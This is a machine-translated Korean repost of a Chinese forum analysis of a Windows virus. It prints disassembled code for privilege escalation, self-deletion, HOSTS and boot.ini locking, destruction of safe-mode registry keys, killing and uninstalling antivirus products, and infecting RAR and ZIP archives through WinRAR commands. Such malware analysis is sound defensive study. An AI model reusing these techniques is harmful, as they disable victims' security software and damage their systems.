놀 기도 하고 * * 분석 - 도둑 집에 서 물건 훔 치기 o0

저자: playboysen 시간: 2009 - 02 - 06, 08: 11 링크:http://bbs.pediy.com/showthread.php?t=81460
제 권:
코드:
seg001:00406394 AdjustPrivilege proc near
seg001:00406394
seg001:00406394                 push    ebx
seg001:00406395                 add     esp, 0FFFFFFD0h
seg001:00406398                 lea     eax, [esp+30h+TokenHandle]
seg001:0040639C                 push    eax             ; TokenHandle
seg001:0040639D                 push    20h             ; DesiredAccess
seg001:0040639F                 call    GetCurrentProcess
seg001:0040639F
seg001:004063A4                 push    eax             ; ProcessHandle
seg001:004063A5                 call    OpenProcessToken
seg001:004063A5
seg001:004063AA                 lea     eax, [esp+30h+Luid]
seg001:004063AE                 push    eax             ; lpLuid
seg001:004063AF                 push    offset Name     ; "SeDebugPrivilege"
seg001:004063B4                 push    0               ; lpSystemName
seg001:004063B6                 call    LookupPrivilegeValueA
seg001:004063B6
seg001:004063BB                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063BF                 mov     [esp+30h+NewState.Privileges.Luid.LowPart], eax
seg001:004063C3                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063C7                 mov     [esp+30h+NewState.Privileges.Luid.HighPart], eax
seg001:004063CB                 mov     [esp+30h+NewState.PrivilegeCount], 1
seg001:004063D3                 xor     ebx, ebx
seg001:004063D5                 mov     [esp+30h+NewState.Privileges.Attributes], ebx
seg001:004063D9                 push    esp             ; ReturnLength
seg001:004063DA                 lea     eax, [esp+34h+PreviousState]
seg001:004063DE                 push    eax             ; PreviousState
seg001:004063DF                 push    10h             ; BufferLength
seg001:004063E1                 lea     eax, [esp+3Ch+NewState]
seg001:004063E5                 push    eax             ; NewState
seg001:004063E6                 push    0               ; DisableAllPrivileges
seg001:004063E8                 mov     eax, [esp+44h+TokenHandle]
seg001:004063EC                 push    eax             ; TokenHandle
seg001:004063ED                 call    AdjustTokenPrivileges
seg001:004063ED
seg001:004063F2                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063F6                 mov     [esp+30h+PreviousState.Privileges.Luid.LowPart], eax
seg001:004063FA                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063FE                 mov     [esp+30h+PreviousState.Privileges.Luid.HighPart], eax
seg001:00406402                 mov     [esp+30h+PreviousState.PrivilegeCount], 1
seg001:0040640A                 or      ebx, 2
seg001:0040640D                 mov     [esp+30h+PreviousState.Privileges.Attributes], ebx
seg001:00406411                 push    esp             ; ReturnLength
seg001:00406412                 push    0               ; PreviousState
seg001:00406414                 mov     eax, [esp+38h+BufferLength]
seg001:00406418                 push    eax             ; BufferLength
seg001:00406419                 lea     eax, [esp+3Ch+PreviousState]
seg001:0040641D                 push    eax             ; NewState
seg001:0040641E                 push    0               ; DisableAllPrivileges
seg001:00406420                 mov     eax, [esp+44h+TokenHandle]
seg001:00406424                 push    eax             ; TokenHandle
seg001:00406425                 call    AdjustTokenPrivileges
seg001:00406425
seg001:0040642A                 add     esp, 30h
seg001:0040642D                 pop     ebx
seg001:0040642E                 retn
seg001:0040642E
seg001:0040642E AdjustPrivilege endp

시스템 서비스 로 등록 하여 9X 시스템 에 프로 세 스 를 숨 기 려 고 합 니 다.
코드:
seg001:00406598 RegisterService proc near    
seg001:00406598
seg001:00406598                 add     esp, 0FFFFFF6Ch
seg001:0040659E                 mov     [esp+94h+var_94], 94h
seg001:004065A5                 push    esp             ; lpVersionInformation
seg001:004065A6                 call    GetVersionExA
seg001:004065A6
seg001:004065AB                 cmp     eax, 1
seg001:004065AE                 sbb     eax, eax
seg001:004065B0                 inc     eax
seg001:004065B1                 cmp     al, 1
seg001:004065B3                 jnz     short loc_4065FE
seg001:004065B3
seg001:004065B5                 cmp     [esp+94h+var_84], 2
seg001:004065BA                 jz      short loc_4065FE
seg001:004065BA
seg001:004065BC                 push    offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1                 call    LoadLibraryA
seg001:004065C1
seg001:004065C6                 mov     hModule, eax
seg001:004065CB                 cmp     hModule, 0
seg001:004065D2                 jz      short loc_4065FE
seg001:004065D2
seg001:004065D4                 push    offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065D9                 mov     eax, hModule
seg001:004065DE                 push    eax             ; hModule
seg001:004065DF                 call    GetProcAddress
seg001:004065DF
seg001:004065E4                 mov     addr_RegisterServiceProcess, eax
seg001:004065E9                 push    1
seg001:004065EB                 push    0
seg001:004065ED                 call    addr_RegisterServiceProcess
seg001:004065F3                 mov     eax, hModule
seg001:004065F8                 push    eax             ; hLibModule
seg001:004065F9                 call    FreeLibrary_0   ; "kernel32.dll"
seg001:004065F9
seg001:004065FE loc_4065FE: 
seg001:004065FE                 add     esp, 94h
seg001:00406604                 retn
seg001:00406604
seg001:00406604 RegisterService endp

자신 삭제 -- "cmd. exe" /c del ***자체 경로 ":
코드:
seg001:00406A70 del_self        proc near
seg001:00406A70
seg001:00406A70                 push    ebp
seg001:00406A71                 mov     ebp, esp
seg001:00406A73                 add     esp, 0FFFFFEECh
seg001:00406A79                 xor     eax, eax
seg001:00406A7B                 mov     [ebp+var_10C], eax
seg001:00406A81                 mov     [ebp+var_110], eax
seg001:00406A87                 mov     [ebp+var_114], eax
seg001:00406A8D                 xor     eax, eax
seg001:00406A8F                 push    ebp
seg001:00406A90                 push    offset sub_406B2B
seg001:00406A95                 push    dword ptr fs:[eax]
seg001:00406A98                 mov     fs:[eax], esp
seg001:00406A9B                 push    104h            ; nSize
seg001:00406AA0                 lea     eax, [ebp+Buffer]
seg001:00406AA6                 push    eax             ; lpBuffer
seg001:00406AA7                 push    offset s_Comspec ; "Comspec"
seg001:00406AAC                 call    GetEnvironmentVariableA ;       ,  cmd.exe    
seg001:00406AAC
seg001:00406AB1                 push    0
seg001:00406AB3                 lea     eax, [ebp+var_110]
seg001:00406AB9                 lea     edx, [ebp+Buffer]
seg001:00406ABF                 mov     ecx, 105h
seg001:00406AC4                 call    sub_403D34
seg001:00406AC4
seg001:00406AC9                 push    [ebp+var_110]
seg001:00406ACF                 push    offset s_CDel   ; " /c del \""
seg001:00406AD4                 lea     edx, [ebp+var_114]
seg001:00406ADA                 xor     eax, eax
seg001:00406ADC                 call    sub_402708      ; GetModuleFileNameA  ***    
seg001:00406ADC
seg001:00406AE1                 push    [ebp+var_114]
seg001:00406AE7                 push    offset dword_406B5C ; uCmdShow
seg001:00406AEC                 lea     eax, [ebp+var_10C]
seg001:00406AF2                 mov     edx, 4
seg001:00406AF7                 call    sub_403E0C
seg001:00406AF7
seg001:00406AFC                 mov     eax, [ebp+var_10C]
seg001:00406B02                 call    sub_403F4C
seg001:00406B02
seg001:00406B07                 push    eax             ; lpCmdLine
seg001:00406B08                 call    WinExec         ;   “cmd.exe /c del ***    ”
seg001:00406B08
seg001:00406B0D                 xor     eax, eax
seg001:00406B0F                 pop     edx
seg001:00406B10                 pop     ecx
seg001:00406B11                 pop     ecx
seg001:00406B12                 mov     fs:[eax], edx
seg001:00406B15                 push    offset loc_406B32
seg001:00406B15
seg001:00406B1A loc_406B1A:                     
seg001:00406B1A                 lea     eax, [ebp+var_114]
seg001:00406B20                 mov     edx, 3
seg001:00406B25                 call    sub_403BEC
seg001:00406B25
seg001:00406B2A                 retn

프로그램 이 실 행 된 후 시스템 HOSTS 파일 을 비우 고 HOSTS 와 시스템 시작 프로필 을 독점 적 으로 잠 그 고 사용자 나 일부 소프트웨어 가 HOSTS 차단 * * 주 소 를 쓰 는 것 을 방지 하 며 XDELBOX 류 프로그램 이 삭 제 를 다시 시작 하 는 것 을 방지 합 니 다 * *:
코드:
seg001:00409138                 mov     edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:0040913D                 call    sub_403D54
seg001:0040913D
seg001:00409142                 mov     eax, [ebp-0ACh]
seg001:00409148                 call    FindFile_AdjustFileTime  ;     ,          (FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime)
seg001:00409148
seg001:0040914D                 cmp     al, 1
seg001:0040914F                 jnz     short loc_409194
seg001:0040914F
seg001:00409151                 lea     eax, [ebp-0B4h]
seg001:00409157                 call    GetSystemDirectory
seg001:00409157
seg001:0040915C                 lea     eax, [ebp-0B4h]
seg001:00409162                 mov     edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:00409167                 call    sub_403D54
seg001:00409167
seg001:0040916C                 mov     eax, [ebp-0B4h]
seg001:00409172                 call    sub_403F4C
seg001:00409172
seg001:00409177                 mov     edx, eax
seg001:00409179                 lea     eax, [ebp-0B0h]
seg001:0040917F                 call    sub_403CF8
seg001:0040917F
seg001:00409184                 mov     eax, [ebp-0B0h]
seg001:0040918A                 mov     edx, 10h
seg001:0040918F                 call    sub_4066AC      ; CreateFileA         ,   
seg001:0040918F
seg001:00409194
seg001:00409194 loc_409194:                             ; CODE XREF: seg001:0040914Fj
seg001:00409194                 lea     eax, [ebp-0B8h]
seg001:0040919A                 call    sub_406DEC
seg001:0040919A
seg001:0040919F                 lea     eax, [ebp-0B8h]
seg001:004091A5                 mov     edx, offset s_Boot_ini ; "boot.ini"
seg001:004091AA                 call    sub_403D54
seg001:004091AA
seg001:004091AF                 mov     eax, [ebp-0B8h]
seg001:004091B5                 call    FindFile_AdjustFileTime  ;     ,          (FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime)
seg001:004091B5
seg001:004091BA                 cmp     al, 1
seg001:004091BC                 jnz     short loc_409201
seg001:004091BC
seg001:004091BE                 lea     eax, [ebp-0C0h]
seg001:004091C4                 call    sub_406DEC
seg001:004091C4
seg001:004091C9                 lea     eax, [ebp-0C0h]
seg001:004091CF                 mov     edx, offset s_Boot_ini ; "boot.ini"
seg001:004091D4                 call    sub_403D54
seg001:004091D4
seg001:004091D9                 mov     eax, [ebp-0C0h]
seg001:004091DF                 call    sub_403F4C
seg001:004091DF
seg001:004091E4                 mov     edx, eax
seg001:004091E6                 lea     eax, [ebp-0BCh]
seg001:004091EC                 call    sub_403CF8
seg001:004091EC
seg001:004091F1                 mov     eax, [ebp-0BCh]
seg001:004091F7                 mov     edx, 10h
seg001:004091FC                 call    sub_4066AC      ;         ,   

관련 레 지 스 트 항목 삭제, 보안 모드 파괴:
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
코드:
seg001:0040C6FF Del_Key:                      
seg001:0040C6FF                 mov     ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C704                 mov     edx, offset s_SystemCurre_5 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C709                 mov     eax, 80000002h
seg001:0040C70E                 call    near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C70E
seg001:0040C713                 cmp     al, 1
seg001:0040C715                 jnz     short loc_40C726
seg001:0040C715
seg001:0040C717                 mov     edx, offset s_SystemCurre_6 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C71C                 mov     eax, 80000002h
seg001:0040C721                 call    RegDeleteKey    ;       
seg001:0040C721
seg001:0040C726 Del_Key:                     
seg001:0040C726                 mov     ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C72B                 mov     edx, offset s_SystemCurre_7 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C730                 mov     eax, 80000002h
seg001:0040C735                 call    near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C735
seg001:0040C73A                 cmp     al, 1
seg001:0040C73C                 jnz     short loc_40C74D
seg001:0040C73C
seg001:0040C73E                 mov     edx, offset s_SystemCurre_8 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
seg001:0040C743                 mov     eax, 80000002h
seg001:0040C748                 call    RegDeleteKey

아래 레 지 스 트 항목 을 삭제 하여 미 러 납치 가 효력 을 잃 게 합 니 다.
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
코드:
seg001:0040C76C                 mov     edx, offset s_SoftwareMic_7 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C771                 mov     eax, 80000002h
seg001:0040C776                 call    near ptr s_L_LxRulBSvw3I+0Ah
seg001:0040C776
seg001:0040C77B                 cmp     al, 1
seg001:0040C77D                 jnz     short loc_40C7AA
seg001:0040C77D
seg001:0040C77F                 push    offset s_SoftwareMic_8 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C784                 mov     eax, off_41356C
seg001:0040C789                 push    dword ptr [eax]
seg001:0040C78B                 push    offset dword_40C884
seg001:0040C790                 lea     eax, [ebp+var_80]
seg001:0040C793                 mov     edx, 3
seg001:0040C798                 call    sub_403E0C
seg001:0040C798
seg001:0040C79D                 mov     edx, [ebp+var_80]
seg001:0040C7A0                 mov     eax, 80000002h
seg001:0040C7A5                 call    RegDeleteKey

USB 쓰기 보호, 파일 완전 숨 기기, USB 디스크 와 CD 를 자체 실행 으로 변경, 시스템 오류 보고 서비스 닫 기 (HKEY LOCAL MACHINE \ SOFTWARE \ Microsoft \ PCHealth \ ErrorReporting 의 DoReport, ShowUI, ReportBootOk 수정, 키 0)
코드:
seg001:0040A080                 push    edi             ; phkResult
seg001:0040A081                 push    offset s_SystemContr_1 ; SYSTEM\ControlSet001\Control\StorageDevicePolicies
seg001:0040A086                 push    80000002h       ; hKey
seg001:0040A08B                 call    RegOpenKeyA
seg001:0040A08B
seg001:0040A090                 push    4               ; cbData
seg001:0040A092                 lea     eax, [ebp+Data]
seg001:0040A095                 push    eax             ; lpData
seg001:0040A096                 push    4               ; dwType
seg001:0040A098                 push    0               ; Reserved
seg001:0040A09A                 push    offset s_Writeprotect ; "WriteProtect"
seg001:0040A09F                 mov     eax, [edi]
seg001:0040A0A1                 push    eax             ; hKey
seg001:0040A0A2                 call    RegSetValueExA
seg001:0040A0A2
seg001:0040A0A7                 mov     eax, [edi]
seg001:0040A0A9                 push    eax             ; hKey
seg001:0040A0AA                 call    RegCloseKey_0
seg001:0040A0AA
seg001:0040A0AF                 xor     eax, eax
seg001:0040A0B1                 mov     dword ptr [ebp+Data], eax
seg001:0040A0B4                 push    edi             ; phkResult
seg001:0040A0B5                 push    offset s_SoftwareMic_4 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:0040A0BA                 push    80000001h       ; hKey
seg001:0040A0BF                 call    RegOpenKeyA
seg001:0040A0BF
seg001:0040A0C4                 push    4               ; cbData
seg001:0040A0C6                 lea     eax, [ebp+Data]
seg001:0040A0C9                 push    eax             ; lpData
seg001:0040A0CA                 push    4               ; dwType
seg001:0040A0CC                 push    0               ; Reserved
seg001:0040A0CE                 push    offset s_Showsuperhidd ; "ShowSuperHidden"
seg001:0040A0D3                 mov     eax, [edi]
seg001:0040A0D5                 push    eax             ; hKey
seg001:0040A0D6                 call    RegSetValueExA
seg001:0040A0D6
seg001:0040A0DB                 mov     eax, [edi]
seg001:0040A0DD                 push    eax             ; hKey
seg001:0040A0DE                 call    RegCloseKey_0
seg001:0040A0DE
seg001:0040A0E3                 mov     dword ptr [ebp+Data], 91h
seg001:0040A0EA                 push    edi             ; phkResult
seg001:0040A0EB                 push    offset s_SoftwareMic_5 ; SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
seg001:0040A0F0                 push    80000002h       ; hKey
seg001:0040A0F5                 call    RegOpenKeyA
seg001:0040A0F5
seg001:0040A0FA                 push    4               ; cbData
seg001:0040A0FC                 lea     eax, [ebp+Data]
seg001:0040A0FF                 push    eax             ; lpData
seg001:0040A100                 push    4               ; dwType
seg001:0040A102                 push    0               ; Reserved
seg001:0040A104                 push    offset s_Nodrivetypeau ; "NoDriveTypeAutoRun"
seg001:0040A109                 mov     eax, [edi]
seg001:0040A10B                 push    eax             ; hKey
seg001:0040A10C                 call    RegSetValueExA
seg001:0040A10C
seg001:0040A111                 mov     eax, [edi]
seg001:0040A113                 push    eax             ; hKey
seg001:0040A114                 call    RegCloseKey_0
......

bsmain. exe 와 RavExt. dll 파일 을 지연 삭제 함으로써 서성 백신 소프트웨어 를 파괴 합 니 다.
윈도 2000/XP/Server 2003 년 에 소프트웨어 업 체 는 파일 이 점용 되 어 바로 교체 하거나 삭제 할 수 없 을 때 MoveFileEx 를 사용 합 니 다. API 함 수 는 시스템 을 레 지 스 트 에 HKEYLOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager  Value: PendingFileRenameOperations 키 아래 지연 삭제 목록 을 만 듭 니 다. 시스템 이 다음 에 시 작 될 때 CSRSS. EXE 프로 세 스 는 이 목록 에 따라 파일 을 지연 업데이트 하거나 지연 삭제 합 니 다.
PendingFileRenameOperations 는 REG 입 니 다.MULTI_SZ 형식의 레 지 스 트 키 는 레 지 스 트 편집기 로 직접 편집 할 수 없습니다. 그렇지 않 으 면 삭제 지연 목록 이 파 괴 됩 니 다.이 키 의 내용 을 보 려 면 레 지 스 트 편집기 나 전용 레 지 스 트 조작 도 구 를 사용 할 수 있 습 니 다.Windows XP 는 재 부팅 할 패 치 를 설치 한 후 PendingFileRenameOperations 를 이용 하여 점용 파일 의 업그레이드 와 삭제 작업 을 제어 합 니 다.
코드:
seg001:00409CF3                 mov     ecx, offset s_Pendingfilere ; "PendingFileRenameOperations"
seg001:00409CF8                 mov     edx, offset s_SystemCurrent ; SYSTEM\CurrentControlSet\Control\Session Manager
seg001:00409CFD                 mov     eax, 80000002h
seg001:00409D02                 call    sub_408150
seg001:00409D02
......
seg001:00409DF9                 push    4               ; dwFlags
seg001:00409DFB                 push    0               ; lpNewFileName
seg001:00409DFD                 lea     eax, [ebp+var_28C]
seg001:00409E03                 call    GetSystemDirectory
seg001:00409E03
seg001:00409E08                 lea     eax, [ebp+var_28C]
seg001:00409E0E                 mov     edx, offset s_Ravext_dll ; "RavExt.dll"
seg001:00409E13                 call    sub_403D54
seg001:00409E13
seg001:00409E18                 mov     eax, [ebp+var_28C]
seg001:00409E1E                 call    sub_403F4C
seg001:00409E1E
seg001:00409E23                 push    eax             ; lpExistingFileName
seg001:00409E24                 call    MoveFileExA
seg001:00409E24
seg001:00409E29                 push    4               ; dwFlags
seg001:00409E2B                 push    0               ; lpNewFileName
seg001:00409E2D                 lea     eax, [ebp+var_290]
seg001:00409E33                 call    GetSystemDirectory
seg001:00409E33
seg001:00409E38                 lea     eax, [ebp+var_290]
seg001:00409E3E                 mov     edx, offset s_Bsmain_exe ; "bsmain.exe"
seg001:00409E43                 call    sub_403D54
seg001:00409E43
seg001:00409E48                 mov     eax, [ebp+var_290]
seg001:00409E4E                 call    sub_403F4C
seg001:00409E4E
seg001:00409E53                 push    eax             ; lpExistingFileName
seg001:00409E54                 call    MoveFileExA

NTFS 의 AUTO 면역 해제:
명령 행 도구 cacls. exe 를 사용 하여 everyone 사용자 가 파일 autorun. inf 에 대한 제어 권한 을 향상 시 킵 니 다.
CACLS filename [/T] [/E] [/C] [/G user:perm]  
파일 의 접근 제어 표 보이 거나 수정 하기 (ACL)
   filename      디 스 플레이 ACL。
   /T            현재 디 렉 터 리 와 모든 하위 디 렉 터 리 에서 지정 한 파일 을 변경 합 니 다. ACL。
   /G user:perm  지정 한 사용자 에 게 접근 권한 을 부여 합 니 다.
                 Perm 가능: R  읽 기
                              W  기록 하 다
                              C  변경 (쓰기)
                              F  완전 제어
코드:
seg001:0040D15D                 mov     eax, [ebp+var_4]
seg001:0040D160                 call    GetVolumeInformation
seg001:0040D160
seg001:0040D165                 mov     eax, [ebp+var_27C]
seg001:0040D16B                 mov     edx, offset s_Ntfs ; "NTFS"
seg001:0040D170                 call    sub_403E98
seg001:0040D170
seg001:0040D175                 jnz     short loc_40D1B1
seg001:0040D175
seg001:0040D177                 push    0
seg001:0040D179                 push    offset s_CmdCEchoYCacl ; "cmd /c echo Y| cacls "
seg001:0040D17E                 push    [ebp+var_4]
seg001:0040D181                 push    offset s_Autorun_infTG ; "autorun.inf /t /g everyone:F"
seg001:0040D186                 lea     eax, [ebp+var_280]

클릭 버튼 메 시 지 를 보 내 면 금 산 독 패 2008 을 자동 으로 마 운 트 해제 합 니 다.
코드:
seg001:0040DAB4 KillDuBa        proc near               ; DATA XREF: start+1126o
seg001:0040DAB4                 push    ebx
seg001:0040DAB5                 push    offset s_2008   ; "     2008         "
seg001:0040DABA                 push    offset s_32770_1 ; "#32770"
seg001:0040DABF                 call    FindWindowA
seg001:0040DABF
seg001:0040DAC4                 mov     ebx, eax
seg001:0040DAC6                 push    offset s_N>     ; "   (&N) >"
seg001:0040DACB                 push    offset s_Button_0 ; "Button"
seg001:0040DAD0                 push    0               ; HWND
seg001:0040DAD2                 push    ebx             ; HWND
seg001:0040DAD3                 call    FindWindowExA
seg001:0040DAD3
seg001:0040DAD8                 mov     ebx, eax
seg001:0040DADA                 push    0               ; lParam
seg001:0040DADC                 push    0               ; wParam
seg001:0040DADE                 push    0F5h            ; Msg
seg001:0040DAE3                 push    ebx             ; hWnd
seg001:0040DAE4                 call    SendMessageA
seg001:0040DAE4
seg001:0040DAE9                 push    0               ; lParam
seg001:0040DAEB                 push    0               ; wParam
seg001:0040DAED                 push    0F5h            ; Msg
seg001:0040DAF2                 push    ebx             ; hWnd
seg001:0040DAF3                 call    SendMessageA
seg001:0040DAF3
seg001:0040DAF8                 push    320h            ; dwMilliseconds
seg001:0040DAFD                 call    Sleep
seg001:0040DAFD
seg001:0040DB02                 push    offset s_2008   ; "     2008         "
seg001:0040DB07                 push    offset s_32770_1 ; "#32770"
seg001:0040DB0C                 call    FindWindowA
seg001:0040DB0C
seg001:0040DB11                 mov     ebx, eax
seg001:0040DB13                 push    offset s_U      ; "  (&U)"
seg001:0040DB18                 push    offset s_Button_0 ; "Button"
seg001:0040DB1D                 push    0               ; HWND
seg001:0040DB1F                 push    ebx             ; HWND
seg001:0040DB20                 call    FindWindowExA
seg001:0040DB20
seg001:0040DB25                 mov     ebx, eax
seg001:0040DB27                 push    0               ; lParam
seg001:0040DB29                 push    0               ; wParam
seg001:0040DB2B                 push    0F5h            ; Msg
seg001:0040DB30                 push    ebx             ; hWnd
seg001:0040DB31                 call    SendMessageA
seg001:0040DB31
seg001:0040DB36                 push    0               ; lParam
seg001:0040DB38                 push    0               ; wParam
seg001:0040DB3A                 push    0F5h            ; Msg
seg001:0040DB3F                 push    ebx             ; hWnd
seg001:0040DB40                 call    SendMessageA
seg001:0040DB40
seg001:0040DB45                 push    0BB8h           ; dwMilliseconds
seg001:0040DB4A                 call    Sleep
seg001:0040DB4A
seg001:0040DB4F                 push    0               ; lpWindowName
seg001:0040DB51                 push    offset s_Ieframe_0 ; "IEFrame"
seg001:0040DB56                 call    FindWindowA
seg001:0040DB56
seg001:0040DB5B                 mov     ebx, eax
seg001:0040DB5D                 push    1               ; lParam
seg001:0040DB5F                 push    0F060h          ; wParam
seg001:0040DB64                 push    112h            ; Msg
seg001:0040DB69                 push    ebx             ; hWnd
seg001:0040DB6A                 call    SendMessageA
seg001:0040DB6A
seg001:0040DB6F                 pop     ebx
seg001:0040DB70                 retn
seg001:0040DB70
seg001:0040DB70 KillDuBa        endp

감염 식 입 * *. rar 와. zip 압축 패키지 - "WinRAR. exe" a -ep -u -inul”:
명령 행 모드:
    A      ——압축 파일 에 파일 추가
    -ep    ——파일 을 추가 할 때 경로 정보 가 포함 되 지 않 습 니 다.
    -u     ——파일 업데이트
    -inul  ——오류 알림 정보 금지
코드:
seg001:0040F7E6                 push    0
seg001:0040F7E8                 push    dword_4149D4
seg001:0040F7EE                 push    offset s_Winrar_exeA-e ; "\\WinRAR.exe a -ep -u -inul "
seg001:0040F7F3                 push    dword_4149D0
seg001:0040F7F9                 push    offset dword_40FF5C
seg001:0040F7FE                 push    [ebp+uCmdShow]  ; uCmdShow
seg001:0040F801                 lea     eax, [ebp+var_1F4]
seg001:0040F807                 mov     edx, 5
seg001:0040F80C                 call    sub_403E0C
seg001:0040F80C
seg001:0040F811                 mov     eax, [ebp+var_1F4]
seg001:0040F817                 call    sub_403F4C
seg001:0040F817
seg001:0040F81C                 push    eax             ; lpCmdLine
seg001:0040F81D                 call    WinExec

키보드 맵 Win + M (모든 창 최소 화) 후 서성 의 정상 적 인 업 그 레이 드 를 막 고, 카 바 마 운 트 해제 프로그램 을 최소 화하 여 카 바 를 마 운 트 해제 합 니 다. /c Date 2005 - 4 - 20 "카 바 의 능 동적 방 어 를 돌파 합 니 다.
코드:
seg001:0041129F                 mov     eax, offset s_Ravmon_exe ; "RavMon.exe"
seg001:004112A4                 call    sub_4076E8
seg001:004112A4
seg001:004112A9                 cmp     al, 1
seg001:004112AB                 jnz     loc_411387
seg001:004112AB
seg001:004112B1                 lea     eax, [ebp+var_1D0]
seg001:004112B7                 push    eax
seg001:004112B8                 mov     ecx, offset s_Installpath ; "installpath"
seg001:004112BD                 mov     edx, offset s_SoftwareRisin ; "SOFTWARE\\rising\\Rav"
seg001:004112C2                 mov     eax, 80000002h
seg001:004112C7                 call    RegQueryValue
......
seg001:004112D7
seg001:004112DC                 push    0               ; dwExtraInfo
seg001:004112DE                 push    0               ; dwFlags
seg001:004112E0                 push    0               ; uMapType
seg001:004112E2                 push    5Bh             ; uCode 5Bh      
seg001:004112E4                 call    MapVirtualKeyA
seg001:004112E4
seg001:004112E9                 push    eax             ; bScan
seg001:004112EA                 push    5Bh             ; bVk
seg001:004112EC                 call    keybd_event
seg001:004112EC
seg001:004112F1                 push    0               ; dwExtraInfo
seg001:004112F3                 push    0               ; dwFlags
seg001:004112F5                 push    0               ; uMapType
seg001:004112F7                 push    4Dh             ; uCode 4Dh "M"
seg001:004112F9                 call    MapVirtualKeyA
......
seg001:0041132B
seg001:00411330                 push    1               ; uCmdShow
seg001:00411332                 mov     edx, off_413554
seg001:00411338                 mov     edx, [edx]
seg001:0041133A                 lea     eax, [ebp+var_1D4]
seg001:00411340                 mov     ecx, offset s_UpdateSetup_e ; "\\Update\\setup.exe"
seg001:00411345                 call    sub_403D98
seg001:00411345
seg001:0041134A                 mov     eax, [ebp+var_1D4]
seg001:00411350                 call    sub_403F4C
seg001:00411350
seg001:00411355                 push    eax             ; lpCmdLine
seg001:00411356                 call    WinExec
seg001:00411356
seg001:0041135B                 push    5DCh            ; dwMilliseconds
seg001:00411360                 call    Sleep
seg001:00411360
seg001:00411365                 mov     eax, lpThreadId
seg001:0041136A                 push    eax             ; lpThreadId
seg001:0041136B                 push    0               ; dwCreationFlags
seg001:0041136D                 push    0               ; lpParameter
seg001:0041136F                 push    offset sub_40DBC8 ; lpStartAddress
seg001:00411374                 push    0               ; dwStackSize
seg001:00411376                 push    0               ; lpThreadAttributes
seg001:00411378                 call    CreateThread
seg001:00411378
seg001:0041137D                 push    0DACh           ; dwMilliseconds
seg001:00411382                 call    Sleep
seg001:00411382
seg001:00411387
seg001:00411387 loc_411387:                             ; CODE XREF: start+E47j
seg001:00411387                 mov     eax, offset s_Avp_exe ; "avp.exe"
seg001:0041138C                 call    sub_4076E8
seg001:0041138C
seg001:00411391                 cmp     al, 1
seg001:00411393                 jnz     uninstall
......

다음으로 전송:https://blog.51cto.com/liong/244753

좋은 웹페이지 즐겨찾기